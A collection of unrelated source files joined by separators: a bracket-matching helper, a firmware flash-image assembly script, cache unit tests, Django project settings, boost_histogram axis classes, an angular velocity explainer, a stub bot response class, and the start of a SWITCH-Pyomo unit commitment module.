# match the closed bracket in a JSON string
def closedBracketIndex(text):
    """Return the prefix of *text* ending where the first '[' is closed.

    The scan stops as soon as bracket depth returns to zero, so a string
    whose first character is not '[' returns just that first character.
    Returns the int 0 (not '') when an opened '[' is never closed —
    callers compare the result against the original string.

    (Renamed the parameter from ``str``, which shadowed the builtin.)
    """
    depth = 0
    index = 0
    for ch in text:
        index += 1
        if ch == "[":
            depth += 1
        elif ch == "]" and depth != 0:
            depth -= 1
        if depth == 0:
            break
    # depth can never go negative: ']' only decrements when depth != 0,
    # so the original unreachable `if c < 0` branch has been dropped.
    if depth == 0:
        return text[0:index]
    else:
        return 0
loadGrid() |
#!/bin/env python3
from mempatch import *
import struct
# Flash areas as (image path, base address[, size]); the external flash
# entry carries an explicit size — presumably load_areas pads/limits the
# area to that length (TODO confirm against mempatch.load_areas).
flashes = [
    ("bin/internal.bin", 0x00200000),
    ("bin/external.bin", 0x90000000, 0x800000)
]
# Payloads to splice into the flash images at fixed addresses.
files = [
    ("bin/pkey.bin", 0x00208ac8),
    ("bin/kernel0.bin", 0x90000008),
    ("bin/kernel1.bin", 0x90400008),
    ("bin/exam0.bin", 0x903F0000),
    ("bin/exam1.bin", 0x907F0000)
]
mem_area = load_areas(flashes)
load_files(files, mem_area)
# Signatures are appended immediately after each kernel image, so their
# addresses depend on the kernel sizes.
offset0 = file_length("bin/kernel0.bin")
sign0_addr = 0x90000008 + offset0
offset1 = file_length("bin/kernel1.bin")
sign1_addr = 0x90400008 + offset1
# Rebinding `files` here is intentional: the first batch was already
# loaded above; this second batch is loaded after the headers are written.
files = [
    ("bin/sign0.bin", sign0_addr),
    ("bin/sign1.bin", sign1_addr)
]
# 8-byte little-endian header at each kernel slot: two uint32s
# (0, kernel length) — presumably a (flags, size) header; confirm format.
overwrite_data_at_address(mem_area, 0x90000000, struct.pack("<II", 0, offset0))
overwrite_data_at_address(mem_area, 0x90400000, struct.pack("<II", 0, offset1))
load_files(files, mem_area)
save_areas(mem_area)
|
import os
import unittest
from unittest.mock import Mock, patch
from cache_gs.cache_classes.cache_data_file import CacheData, CacheDataFile
from tests.test_tools import raise_test_exception
def force_exception(*args, **kwargs):
    """Stand-in callable for patching: always raises the shared test exception."""
    raise_test_exception()
class TestCacheDataFile(unittest.TestCase):
    """Round-trip, repr and failure-path tests for CacheDataFile."""
    def setUp(self):
        # File written by the save tests; removed again in tearDown.
        self.file_name = 'test.json'
    def tearDown(self):
        if os.path.isfile(self.file_name):
            os.unlink(self.file_name)
    def test_save(self):
        # Save then reload: the persisted CacheData must round-trip intact.
        cd = CacheData("test_section", "test_key", "test_value", 0)
        cdf = CacheDataFile('test', cd)
        self.assertTrue(cdf.save(self.file_name))
        cdf2 = CacheDataFile(self.file_name)
        self.assertEqual(cdf.data, cdf2.data)
    def test_repr(self):
        cd = CacheData('sec', 'key', 'value', 0)
        cdf = CacheDataFile('test', cd)
        self.assertEqual(
            repr(cdf),
            "CacheDataFile('test',CacheData('sec','key','value',0))")
    @patch("os.path.isfile", Mock())
    def test_load_exception(self):
        # Pretend the file exists so load() proceeds and fails on reading
        # a file that isn't actually there.
        os.path.isfile.return_value = True
        cdf = CacheDataFile()
        self.assertFalse(cdf.load('abcd'))
    @patch("json.dumps", force_exception)
    def test_save_exception(self):
        # Serialization failure must make save() return False, not raise.
        cd = CacheData("sec", "key", "value", 0)
        cdf = CacheDataFile(cache_data=cd)
        self.assertFalse(cdf.save('abcd'))
        if os.path.isfile('abcd'):
            os.unlink('abcd')
|
"""
Django settings for socialdistribution project.
Generated by 'django-admin startproject' using Django 3.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
from dotenv import load_dotenv
import django_on_heroku
# NOTE(review): duplicate import of django_on_heroku — harmless, drop one.
import django_on_heroku
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
load_dotenv()
# env variables
SECRET_KEY = os.environ.get("SECRET_KEY")
DEBUG = (os.environ.get("DEBUG") == 'True')
GITHUB_URL = os.environ.get("GITHUB_URL")
HOST_API_URL = os.environ.get("HOST_API_URL")
HOST_URL = os.environ.get("HOST_URL")
API_TOKEN = os.environ.get("API_TOKEN")
TEAM_12_TOKEN = os.environ.get("TEAM_12_TOKEN")
TEAM_18_TOKEN = os.environ.get("TEAM_18_TOKEN")
TEAM_02_TOKEN = os.environ.get("TEAM_02_TOKEN")
# NOTE(review): '*' disables host validation — acceptable only because
# django_on_heroku manages hosts below; confirm for production.
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'app.apps.AppConfig',
    'api.apps.ApiConfig',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'rest_framework.authtoken',
    'friendship',
    'crispy_forms',
    'drf_yasg',
    'corsheaders',
]
CRISPY_TEMPLATE_PACK = 'bootstrap4'
# NOTE(review): corsheaders docs place CorsMiddleware as high as possible,
# above CommonMiddleware — here it sits near the bottom. Also
# CommonMiddleware appears twice (once more between the cache middlewares).
# Confirm both orderings are intended.
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.cache.UpdateCacheMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.cache.FetchFromCacheMiddleware',
]
# Whole-site page cache TTL (seconds) for the cache middleware pair above.
CACHE_MIDDLEWARE_SECONDS = 1
ROOT_URLCONF = 'socialdistribution.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [BASE_DIR / 'templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'socialdistribution.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# (django_on_heroku.settings() at the bottom swaps this for DATABASE_URL
# when running on Heroku.)
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Edmonton'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
LOGIN_URL = '/app/accounts/login/'
LOGIN_REDIRECT_URL = '/app/'
LOGOUT_REDIRECT_URL = '/app/'
AUTH_USER_MODEL = 'api.User'
REST_FRAMEWORK = {
    'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
    'PAGE_SIZE': 10,
    'DEFAULT_THROTTLE_CLASSES': [
        'rest_framework.throttling.AnonRateThrottle',
        'rest_framework.throttling.UserRateThrottle'
    ],
    'DEFAULT_THROTTLE_RATES': {
        'anon': '1/second', #1/second
        'user': '1/second', #1/second
    }
}
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        'LOCATION': 'unique-snowflake',
        'OPTIONS': {
            # NOTE(review): 'server_max_value_length' looks like a memcached
            # option; LocMemCache likely ignores it — confirm.
            'server_max_value_length': 1024 * 1024 * 1024 * 1,
        }
    }
}
CORS_ORIGIN_ALLOW_ALL = True
django_on_heroku.settings(locals(), test_runner=False) # bottom of the file
|
from __future__ import absolute_import, division, print_function
del absolute_import, division, print_function
from .._core.axis import options
from .._core import axis as ca
from .kwargs import KWArgs
from .sig_tools import inject_signature
from .axis_transform import AxisTransform
from .utils import cast, register, set_family, MAIN_FAMILY, CPP_FAMILY, set_module
import copy
# Contains common methods and properties to all axes
@set_module("boost_histogram.axis")
class Axis(object):
    # Single slot: every Python axis is a thin wrapper over a C++ axis
    # object stored in _ax; no per-instance __dict__ is needed.
    __slots__ = ("_ax",)
    def __copy__(self):
        other = self.__class__.__new__(self.__class__)
        other._ax = copy.copy(self._ax)
        return other
    def index(self, value):
        """
        Return the fractional index(es) given a value (or values) on the axis.
        """
        return self._ax.index(value)
    def value(self, index):
        """
        Return the value(s) given an (fractional) index (or indices).
        """
        return self._ax.value(index)
    def bin(self, index):
        """
        Return the edges of the bins as a tuple for a
        continuous axis or the bin value for a
        non-continuous axis, when given an index.
        """
        return self._ax.bin(index)
    # Equality delegates entirely to the underlying C++ axis.
    # NOTE(review): __eq__ is defined without __hash__, which makes
    # instances unhashable on Python 3 — confirm that is intended.
    def __eq__(self, other):
        return self._ax == other._ax
    def __ne__(self, other):
        return self._ax != other._ax
    @property
    def metadata(self):
        """
        Get or set the metadata associated with this axis.
        """
        return self._ax.metadata
    @metadata.setter
    def metadata(self, value):
        self._ax.metadata = value
    @classmethod
    def _convert_cpp(cls, cpp_object):
        # Wrap an existing C++ axis without invoking __init__.
        nice_ax = cls.__new__(cls)
        nice_ax._ax = cpp_object
        return nice_ax
    def __len__(self):
        return self._ax.size
    def __iter__(self):
        return self._ax.__iter__()
# Mixin for main style classes
# Contains common methods and properties to all Main module axes
class MainAxisMixin(object):
    __slots__ = ()
    def __repr__(self):
        # e.g. Regular(10, 0, 1, underflow=False); args come from the
        # concrete subclass via _repr_args().
        return "{self.__class__.__name__}({args}{kwargs})".format(
            self=self, args=self._repr_args(), kwargs=self._repr_kwargs()
        )
    def _repr_kwargs(self):
        """
        Return options for use in repr. Metadata is last,
        just in case it spans multiple lines.
        """
        ret = ""
        # growth/circular imply flow-bin behavior, so the individual
        # underflow/overflow flags are only shown when neither is set.
        if self.options.growth:
            ret += ", growth=True"
        elif self.options.circular:
            ret += ", circular=True"
        else:
            if not self.options.underflow:
                ret += ", underflow=False"
            if not self.options.overflow:
                ret += ", overflow=False"
        if self.metadata is not None:
            ret += ", metadata={0!r}".format(self.metadata)
        return ret
    @property
    def options(self):
        """
        Return the options.  Fields:
          .underflow - True if axes captures values that are too small
          .overflow  - True if axes captures values that are too large
                       (or non-valid for category axes)
          .growth    - True if axis can grow
          .circular  - True if axis wraps around
        """
        return self._ax.options
    @property
    def size(self):
        """
        Return number of bins excluding under- and overflow.
        """
        return self._ax.size
    @property
    def extent(self):
        """
        Return number of bins including under- and overflow.
        """
        return self._ax.extent
    def __getitem__(self, i):
        """
        Access a bin, using normal Python syntax for wraparound.
        """
        # UHI support
        if callable(i):
            i = i(self)
        else:
            # Negative indices count from the end, as for sequences.
            if i < 0:
                i += self._ax.size
            if i >= self._ax.size:
                raise IndexError(
                    "Out of range access, {0} is more than {1}".format(i, self._ax.size)
                )
        return self.bin(i)
    @property
    def edges(self):
        """
        An array of bin edges.
        """
        return self._ax.edges
    @property
    def centers(self):
        """
        An array of bin centers.
        """
        return self._ax.centers
    @property
    def widths(self):
        """
        An array of bin widths.
        """
        return self._ax.widths
# Contains all common methods for cpp module axes
class CppAxisMixin(object):
    # Mirrors MainAxisMixin's accessors, but deliberately exposes them as
    # plain methods (not properties) to match the C++-style cpp family.
    __slots__ = ()
    def __repr__(self):
        return repr(self._ax)
    def options(self):
        """
        Return the options.  Fields:
          .underflow - True if axes captures values that are too small
          .overflow  - True if axes captures values that are too large
                       (or non-valid for category axes)
          .growth    - True if axis can grow
          .circular  - True if axis wraps around
        """
        return self._ax.options
    def size(self):
        """
        Return number of bins excluding under- and overflow.
        """
        return self._ax.size
    def extent(self):
        """
        Return number of bins including under- and overflow.
        """
        return self._ax.extent
    def edges(self):
        """
        An array of bin edges.
        """
        return self._ax.edges
    def centers(self):
        """
        An array of bin centers.
        """
        return self._ax.centers
    def widths(self):
        """
        An array of bin widths.
        """
        return self._ax.widths
# Contains all common methods and properties for Regular axes
@register(
    {
        ca.regular_uoflow,
        ca.regular_uoflow_growth,
        ca.regular_uflow,
        ca.regular_oflow,
        ca.regular_none,
        ca.regular_numpy,
        ca.regular_pow,
        ca.regular_trans,
        ca.regular_circular,
    }
)
class BaseRegular(Axis):
    __slots__ = ()
    @inject_signature(
        "self, bins, start, stop, *, metadata=None, underflow=True, overflow=True, growth=False, circular=False, transform=None"
    )
    def __init__(self, bins, start, stop, **kwargs):
        """
        Make a regular axis with nice keyword arguments for underflow,
        overflow, and growth.
        Parameters
        ----------
        bins : int
            The number of bins between start and stop
        start : float
            The beginning value for the axis
        stop : float
            The ending value for the axis
        metadata : Any
            Any Python object to attach to the axis, like a label.
        underflow : bool = True
            Enable the underflow bin
        overflow : bool = True
            Enable the overflow bin
        growth : bool = False
            Allow the axis to grow if a value is encountered out of range.
            Be careful, the axis will grow as large as needed.
        circular : bool = False
            Filling wraps around.
        transform : Optional[AxisTransform] = None
            Transform the regular bins (Log, Sqrt, and Pow(v))
        """
        with KWArgs(kwargs) as k:
            metadata = k.optional("metadata")
            transform = k.optional("transform")
            options = k.options(
                underflow=True, overflow=True, growth=False, circular=False
            )
        # Select the concrete backing axis implementation for the options.
        if transform is not None:
            if options != {"underflow", "overflow"}:
                raise KeyError("Transform supplied, cannot change other options")
            # Guard against passing the transform class instead of an
            # instance (e.g. transform=Log rather than transform=Log()).
            # isinstance also rejects indirect subclasses passed as classes
            # and arbitrary non-transform objects with a clear TypeError;
            # the previous check against transform.__bases__ raised an
            # AttributeError for non-class objects and missed subclasses
            # of subclasses.
            if not isinstance(transform, AxisTransform):
                raise TypeError("You must pass an instance, use {}()".format(transform))
            self._ax = transform._produce(bins, start, stop, metadata)
        elif options == {"growth", "underflow", "overflow"}:
            self._ax = ca.regular_uoflow_growth(bins, start, stop, metadata)
        elif options == {"underflow", "overflow"}:
            self._ax = ca.regular_uoflow(bins, start, stop, metadata)
        elif options == {"underflow"}:
            self._ax = ca.regular_uflow(bins, start, stop, metadata)
        elif options == {"overflow"}:
            self._ax = ca.regular_oflow(bins, start, stop, metadata)
        elif options == {
            "circular",
            "underflow",
            "overflow",
        } or options == {  # growth=True should work
            "circular",
            "overflow",
        }:  # growth=True, underflow=False is also correct
            self._ax = ca.regular_circular(bins, start, stop, metadata)
        elif options == set():
            self._ax = ca.regular_none(bins, start, stop, metadata)
        else:
            raise KeyError("Unsupported collection of options")
@set_module("boost_histogram.axis")
@set_family(MAIN_FAMILY)
class Regular(BaseRegular, MainAxisMixin):
    __slots__ = ()
    def _repr_args(self):
        "Return inner part of signature for use in repr"
        edges = self.edges
        return "{0:g}, {1:g}, {2:g}".format(self.size, edges[0], edges[-1])
    def _repr_kwargs(self):
        "Return keyword part of signature, appending transform if present"
        parts = super(Regular, self)._repr_kwargs()
        transform = self.transform
        if transform is not None:
            parts += ", transform={0}".format(transform)
        return parts
    @property
    def transform(self):
        "The attached axis transform, or None if this axis has none"
        ax = self._ax
        if hasattr(ax, "transform"):
            return cast(self, ax.transform, AxisTransform)
        return None
@set_module("boost_histogram.cpp.axis")
@set_family(CPP_FAMILY)
class regular(BaseRegular, CppAxisMixin):
    __slots__ = ()
    def transform(self):
        "Return the attached transform, or None (method form for cpp API)"
        ax = self._ax
        if hasattr(ax, "transform"):
            return cast(self, ax.transform, AxisTransform)
        return None
@register(
    {
        ca.variable_none,
        ca.variable_uflow,
        ca.variable_oflow,
        ca.variable_uoflow,
        ca.variable_uoflow_growth,
        ca.variable_circular,
    }
)
class BaseVariable(Axis):
    __slots__ = ()
    # circular=False added: the docstring documents it and k.options()
    # below accepts it, but it was missing from the injected signature.
    @inject_signature(
        "self, edges, *, metadata=None, underflow=True, overflow=True, circular=False, growth=False"
    )
    def __init__(self, edges, **kwargs):
        """
        Make an axis with irregularly spaced bins. Provide a list
        or array of bin edges, and len(edges)-1 bins will be made.
        Parameters
        ----------
        edges : Array[float]
            The edges for the bins. There will be one less bin than edges.
        metadata : object
            Any Python object to attach to the axis, like a label.
        underflow : bool = True
            Enable the underflow bin
        overflow : bool = True
            Enable the overflow bin
        circular : bool = False
            Enable wraparound
        growth : bool = False
            Allow the axis to grow if a value is encountered out of range.
            Be careful, the axis will grow as large as needed.
        """
        with KWArgs(kwargs) as k:
            metadata = k.optional("metadata")
            options = k.options(
                underflow=True, overflow=True, circular=False, growth=False
            )
        # Select the concrete backing axis implementation for the options.
        if options == {"growth", "underflow", "overflow"}:
            self._ax = ca.variable_uoflow_growth(edges, metadata)
        elif options == {"underflow", "overflow"}:
            self._ax = ca.variable_uoflow(edges, metadata)
        elif options == {"underflow"}:
            self._ax = ca.variable_uflow(edges, metadata)
        elif options == {"overflow"}:
            self._ax = ca.variable_oflow(edges, metadata)
        elif options == {
            "circular",
            "underflow",
            "overflow",
        } or options == {  # growth=True should work
            "circular",
            "overflow",
        }:  # growth=True, underflow=False is also correct
            self._ax = ca.variable_circular(edges, metadata)
        elif options == set():
            self._ax = ca.variable_none(edges, metadata)
        else:
            raise KeyError("Unsupported collection of options")
@set_family(MAIN_FAMILY)
@set_module("boost_histogram.axis")
class Variable(BaseVariable, MainAxisMixin):
    __slots__ = ()
    def _repr_args(self):
        "Return inner part of signature for use in repr"
        edges = self.edges
        if len(self) <= 20:
            # Short axes: list every edge explicitly
            return "[{}]".format(", ".join(format(v, "g") for v in edges))
        # Long axes: fall back to the repr of the edge array
        return repr(edges)
@set_family(CPP_FAMILY)
@set_module("boost_histogram.cpp.axis")
class variable(BaseVariable, CppAxisMixin):
    # cpp-family spelling of Variable; all behavior comes from the bases.
    __slots__ = ()
@register(
    {
        ca.integer_none,
        ca.integer_uflow,
        ca.integer_oflow,
        ca.integer_uoflow,
        ca.integer_growth,
        ca.integer_circular,
    }
)
class BaseInteger(Axis):
    __slots__ = ()
    # circular=False added: the docstring documents it and k.options()
    # below accepts it, but it was missing from the injected signature.
    @inject_signature(
        "self, start, stop, *, metadata=None, underflow=True, overflow=True, circular=False, growth=False"
    )
    def __init__(self, start, stop, **kwargs):
        """
        Make an integer axis, with a collection of consecutive integers.
        Parameters
        ----------
        start : int
            The beginning value for the axis
        stop : int
            The ending value for the axis. (stop-start) bins will be created.
        metadata : object
            Any Python object to attach to the axis, like a label.
        underflow : bool = True
            Enable the underflow bin
        overflow : bool = True
            Enable the overflow bin
        circular : bool = False
            Enable wraparound
        growth : bool = False
            Allow the axis to grow if a value is encountered out of range.
            Be careful, the axis will grow as large as needed.
        """
        with KWArgs(kwargs) as k:
            metadata = k.optional("metadata")
            options = k.options(
                underflow=True, overflow=True, circular=False, growth=False
            )
        # underflow and overflow settings are ignored, integers are always
        # finite and thus cannot end up in a flow bin when growth is on
        if "growth" in options and "circular" not in options:
            self._ax = ca.integer_growth(start, stop, metadata)
        elif options == {"underflow", "overflow"}:
            self._ax = ca.integer_uoflow(start, stop, metadata)
        elif options == {"underflow"}:
            self._ax = ca.integer_uflow(start, stop, metadata)
        elif options == {"overflow"}:
            self._ax = ca.integer_oflow(start, stop, metadata)
        elif (
            "circular" in options and "growth" not in options
        ):  # growth=True should work
            self._ax = ca.integer_circular(
                start, stop, metadata
            )  # flow bins do not matter
        elif options == set():
            self._ax = ca.integer_none(start, stop, metadata)
        else:
            raise KeyError("Unsupported collection of options")
@set_family(MAIN_FAMILY)
@set_module("boost_histogram.axis")
class Integer(BaseInteger, MainAxisMixin):
    __slots__ = ()
    def _repr_args(self):
        "Return inner part of signature for use in repr"
        edges = self.edges
        return "{0:g}, {1:g}".format(edges[0], edges[-1])
@set_family(CPP_FAMILY)
@set_module("boost_histogram.cpp.axis")
class integer(BaseInteger, CppAxisMixin):
    # cpp-family spelling of Integer; all behavior comes from the bases.
    __slots__ = ()
@register({ca.category_str_growth, ca.category_str})
class BaseStrCategory(Axis):
    __slots__ = ()
    @inject_signature("self, categories, *, metadata=None, growth=False")
    def __init__(self, categories, **kwargs):
        """
        Make a category axis with strings; items will
        be added to a predefined list of bins or a growing (with growth=True)
        list of bins.
        Parameters
        ----------
        categories : Iterable[str]
            The bin values in strings. May be empty if growth is enabled.
        metadata : object
            Any Python object to attach to the axis, like a label.
        growth : bool = False
            Allow the axis to grow if a value is encountered out of range.
            Be careful, the axis will grow as large as needed.
        """
        with KWArgs(kwargs) as k:
            metadata = k.optional("metadata")
            options = k.options(growth=False)
        # We need to make sure we support Python 2 for now :(
        # henryiii: This shortcut possibly should be removed
        # NOTE(review): a bare string is expanded into its characters here
        # (list("ab") -> ["a", "b"]); confirm this convenience is intended.
        if isinstance(categories, (type(""), type(u""))):
            categories = list(categories)
        if options == {"growth"}:
            self._ax = ca.category_str_growth(categories, metadata)
        elif options == set():
            self._ax = ca.category_str(categories, metadata)
        else:
            raise KeyError("Unsupported collection of options")
@register({ca.category_int, ca.category_int_growth})
class BaseIntCategory(Axis):
    __slots__ = ()
    @inject_signature("self, categories, *, metadata=None, growth=False")
    def __init__(self, categories, **kwargs):
        """
        Make a category axis with ints; items will
        be added to a predefined list of bins or a growing (with growth=True)
        list of bins. An empty list is allowed if growth=True.
        Parameters
        ----------
        categories : Iterable[int]
            The bin values (ints). May be empty if growth is enabled.
        metadata : object
            Any Python object to attach to the axis, like a label.
        growth : bool = False
            Allow the axis to grow if a value is encountered out of range.
            Be careful, the axis will grow as large as needed.
        """
        with KWArgs(kwargs) as k:
            metadata = k.optional("metadata")
            options = k.options(growth=False)
        if options == {"growth"}:
            self._ax = ca.category_int_growth(categories, metadata)
        elif options == set():
            self._ax = ca.category_int(categories, metadata)
        else:
            raise KeyError("Unsupported collection of options")
class CategoryMixin(object):
    __slots__ = ()
    def _repr_kwargs(self):
        """
        Return options for use in repr. Metadata is last,
        just in case it spans multiple lines.
        This is specialized for Category axes to avoid repeating
        the flow arguments unnecessarily.
        """
        parts = []
        # growth and circular are mutually exclusive in the repr;
        # growth wins when both are set, matching the original order.
        if self.options.growth:
            parts.append(", growth=True")
        elif self.options.circular:
            parts.append(", circular=True")
        if self.metadata is not None:
            parts.append(", metadata={0!r}".format(self.metadata))
        return "".join(parts)
@set_family(MAIN_FAMILY)
@set_module("boost_histogram.axis")
class StrCategory(BaseStrCategory, CategoryMixin, MainAxisMixin):
    __slots__ = ()
    def _repr_args(self):
        "Return inner part of signature for use in repr"
        inner = ", ".join(repr(c) for c in self)
        return "[" + inner + "]"
@set_family(MAIN_FAMILY)
@set_module("boost_histogram.axis")
class IntCategory(BaseIntCategory, CategoryMixin, MainAxisMixin):
    __slots__ = ()
    def _repr_args(self):
        "Return inner part of signature for use in repr"
        inner = ", ".join(format(c, "g") for c in self)
        return "[" + inner + "]"
@set_family(CPP_FAMILY)
@set_module("boost_histogram.cpp.axis")
class int_category(BaseIntCategory, CppAxisMixin):
    # cpp-family spelling of IntCategory; all behavior comes from the bases.
    __slots__ = ()
@set_family(CPP_FAMILY)
@set_module("boost_histogram.cpp.axis")
class str_category(BaseStrCategory, CppAxisMixin):
    # cpp-family spelling of StrCategory; all behavior comes from the bases.
    __slots__ = ()
|
#!/usr/bin/env python
# coding: utf-8
# # Angular Velocity
# There are two ways to think about <i>angular velocity</i>.
#
# ## Case 1
# Body 1 is orbiting body 2, just like Earth travels on a curved path about the sun's rotational axis.
# 
# <i>Caption</i>. On the left, imagine having a bird's eye view of the plane that body 1 is orbiting body 2 (black dot at center) in. If body 1 were to conserve its angular velocity, body 1's orbital speed would quicken as its orbital distance from the center increased (from A to D). Credit: G. O. Hollyday.
# The velocity with which Earth orbits the sun is Earth's angular velocity. At a fixed angular velocity, the speed of Earth's trajectory around the sun would be slower if Earth were closer to the sun. The farther body 1 is from body 2, the faster body 1's linear velocity must be to complete an orbit in the same amount of time, in order to maintain its angular velocity (see image above).
#
# ## Case 2
# A component of a body rotates within and as part of a single body (this is called <i>solid body rotation</i>). Every component of a single body is rotating about an axis of rotation.
# 
# <i>Caption</i>. As the figure skater's body rotates with the same angular velocity $\omega$, body parts farther from the figure skater's axis of rotation, or those with greater radius R, will have a higher orbital speed. In this pose, the figure skater's shoulder has a slower orbital speed than her foot, although both body parts are traveling at the same angular velocity. Credit: G. O. Hollyday.
# For example, a figure skater spins with a certain angular velocity. Since each part of their body is connected [think of your body as a connected collection of very small volumes (e.g. cells, body parts)], every component rotates together at the same angular velocity. Each component has the same angular velocity, but may be moving at a different speed than other components in order to remain part of the body.
#
# Start by considering a spinning figure skater with her leg extended (see image above). The foot (red R$_2$) has a larger radius and has to travel a longer arc about the body to line up with the shoulder (pink R$_1$), which is closer to the rotational axis (maroon $\omega$) and does not have to travel as large of a distance about the body. In the same amount of time (over the same angle change), these body parts must travel different speeds to maintain the body's rate of rotation (angular velocity). A component must move faster if it is located at larger radii from the rotational axis, so the foot would have a faster linear velocity than the shoulder would.
#
# The figure skater in the image above spins with the same angular velocity even though her outstretched limbs may travel at faster linear velocities than her torso.
#
# The relationship between angular velocity $\omega$ and linear velocity v is
#
# $$v = r \times \omega$$
#
# where r is the distance from the body to the rotational axis (the axis about which the body is rotating with angular velocity $\omega$). The component of the body's linear velocity that affects the magnitude (value) of angular velocity is perpendicular to the radius vector and perpendicular to the rotational axis.
#
# A solid, rotating body can have the same angular velocity, yet portions of the body at different radii will have different linear velocities. If we are only looking at the angular velocity in z, so that our rotational axis is z, then the perpendicular radii would make up different sized orbits in the xy plane (at various z). You can also think of the distances from the rotational axis as nested cylinders. The outer orbits/cylinders would be at larger radii, so to maintain the body's rotational velocity, that portion of the body would need a linear velocity (tangential to the orbit/cylinder made in the xy plane, or rather, perpendicular to the radius) that is faster than the portions of the body at smaller orbits/cylinders (radii).
#
# What if there was a rotating planetary body that could not rotate together at the same angular velocity? This is true for a synestia. We define a synestia by describing it in terms of solid body rotation (Case 2). The inner planet-like region of a synestia corotates at the same angular velocity, but the outer disk-like region rotates with slower angular velocities.
|
from .response import BotResponse
class NothingResponse(BotResponse):
    """A no-op response: run() intentionally does nothing."""
    def run(self):
        # Deliberate no-op; selected when the bot should produce no output.
        pass
|
# Copyright 2015 The Switch Authors. All rights reserved.
# Licensed under the Apache License, Version 2, which is in the LICENSE file.
"""
Defines model components to describe unit commitment of projects for the
SWITCH-Pyomo model. This module is mutually exclusive with the
project.no_commit module which specifies simplified dispatch
constraints. If you want to use this module directly in a list of switch
modules (instead of including the package project.unitcommit), you will also
need to include the module project.unitcommit.fuel_use.
SYNOPSIS
>>> from switch_mod.utilities import define_AbstractModel
>>> model = define_AbstractModel(
... 'timescales', 'financials', 'load_zones', 'fuels',
... 'gen_tech', 'project.build', 'project.dispatch', 'project.unitcommit')
>>> instance = model.load_inputs(inputs_dir='test_dat')
"""
import os
from pyomo.environ import *
def define_components(mod):
    """
    Adds components to a Pyomo abstract model object to describe
    unit commitment for projects. Unless otherwise stated, all power
    capacity is specified in units of MW and all sets and parameters
    are mandatory.
    -- Commit decision, limits, and headroom --
    CommitProject[(proj, t) in PROJ_DISPATCH_POINTS] is a decision
    variable of how much capacity (MW) from each project to commit in
    each timepoint. By default, this operates in continuous mode.
    Include the project.unitcommit.discrete module to force this to
    operate with discrete unit commitment.
    proj_max_commit_fraction[(proj, t) in PROJ_DISPATCH_POINTS]
    describes the maximum commit level as a fraction of available
    capacity (capacity that is built and expected to be available for
    commitment; derated by annual expected outage rate). This has
    limited use cases, but could be used to simulate outages (scheduled
    or non-scheduled) in a production-cost simulation. This optional
    parameter has a default value of 1.0, indicating that all available
    capacity can be committed. If you wish to have discrete unit
    commitment, I advise overriding the default behavior and specifying
    a more discrete treatment of outages.
    proj_min_commit_fraction[(proj, t) in PROJ_DISPATCH_POINTS]
    describes the minimum commit level as a fraction of available
    capacity. This is useful for describing must-run plants that ensure
    reliable grid operations, and for forcing hydro plants to operate at
    some minimal level to maintain streamflow. This can also be used to
    specify baseload plants that must be run year-round. This optional
    parameter will default to proj_max_commit_fraction for generation
    technologies marked baseload and 0 for all other generators.
    CommitLowerLimit[(proj, t) in PROJ_DISPATCH_POINTS] is an expression
    that describes the minimum capacity that must be committed. This is
    derived from installed capacity and proj_min_commit_fraction.
    CommitUpperLimit[(proj, t) in PROJ_DISPATCH_POINTS] is an expression
    that describes the maximum capacity available for commitment. This
    is derived from installed capacity and proj_max_commit_fraction.
    Enforce_Commit_Lower_Limit[(proj, t) in PROJ_DISPATCH_POINTS] and
    Enforce_Commit_Upper_Limit[(proj, t) in PROJ_DISPATCH_POINTS] are
    constraints that limit CommitProject to the upper and lower bounds
    defined above.
    CommitLowerLimit <= CommitProject <= CommitUpperLimit
    CommitSlackUp[(proj, t) in PROJ_DISPATCH_POINTS] is an expression
    that describes the amount of additional capacity available for
    commitment: CommitUpperLimit - CommitProject
    CommitSlackDown[(proj, t) in PROJ_DISPATCH_POINTS] is an expression
    that describes the amount of committed capacity that could be taken
    offline: CommitProject - CommitLowerLimit
    -- Startup and Shutdown --
    The capacity started up or shutdown is completely determined by
    the change in CommitProject from one hour to the next, but we can't
    calculate these directly within the linear program because
